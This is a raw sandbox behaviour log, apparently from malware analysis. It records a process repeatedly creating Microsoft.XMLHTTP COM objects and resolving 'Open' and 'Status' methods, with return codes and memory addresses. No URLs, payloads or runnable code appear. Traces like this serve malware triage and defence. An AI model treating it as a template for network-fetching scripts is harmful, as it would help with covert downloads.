	[0921.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0921.964] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0921.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0921.965] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0921.965] SysStringLen (param_1=0x0) returned 0x0
	[0921.965] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0921.965] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0921.965] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72c0) returned 0x0
	[0921.965] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0921.965] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0921.966] ??2@YAPEAX_K@Z () returned 0x62f330
	[0921.966] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0921.966] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0921.966] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0921.966] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72c0) returned 0x0
	[0921.966] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72c0) returned 0x3
	[0921.966] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.966] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0921.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0921.969] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0921.969] SysStringLen (param_1=0x0) returned 0x0
	[0921.969] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0921.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0921.969] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0921.969] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0921.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0921.970] ??2@YAPEAX_K@Z () returned 0x62f310
	[0921.970] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0921.970] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0921.970] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0921.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0921.970] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0921.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.970] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0921.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0921.970] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0921.970] SysStringLen (param_1=0x0) returned 0x0
	[0921.970] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0921.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0921.971] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0921.971] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0921.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7248) returned 0x0
	[0921.971] ??2@YAPEAX_K@Z () returned 0x62f330
	[0921.971] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7248, pUnkSite=0x62f330) 
	[0921.971] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0921.971] XMLHTTPRequest:IUnknown:Release (This=0x49c7248) returned 0x0
	[0921.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0921.971] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0921.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.971] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0921.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0921.971] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0921.971] SysStringLen (param_1=0x0) returned 0x0
	[0921.971] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0921.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0921.972] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7290) returned 0x0
	[0921.972] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0921.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0921.972] ??2@YAPEAX_K@Z () returned 0x62f310
	[0921.972] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0921.972] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0921.972] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0921.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7290) returned 0x0
	[0921.972] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7290) returned 0x3
	[0921.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.972] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0921.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0921.972] longjmp () 
	[0921.973] longjmp () 
	[0921.973] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0921.973] SysStringLen (param_1=0x0) returned 0x0
	[0921.973] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0921.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0921.973] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0921.973] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0921.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0921.973] ??2@YAPEAX_K@Z () returned 0x62f330
	[0921.973] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0921.973] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0921.973] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0921.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0921.973] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0921.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.974] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0921.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0921.974] longjmp () 
	[0921.974] longjmp () 
	[0921.974] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0921.974] SysStringLen (param_1=0x0) returned 0x0
	[0921.974] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0921.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0921.975] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0921.975] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0921.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0921.975] ??2@YAPEAX_K@Z () returned 0x62f310
	[0921.975] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0921.975] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0921.975] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0921.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0921.975] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0921.975] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0921.975] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0921.976] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
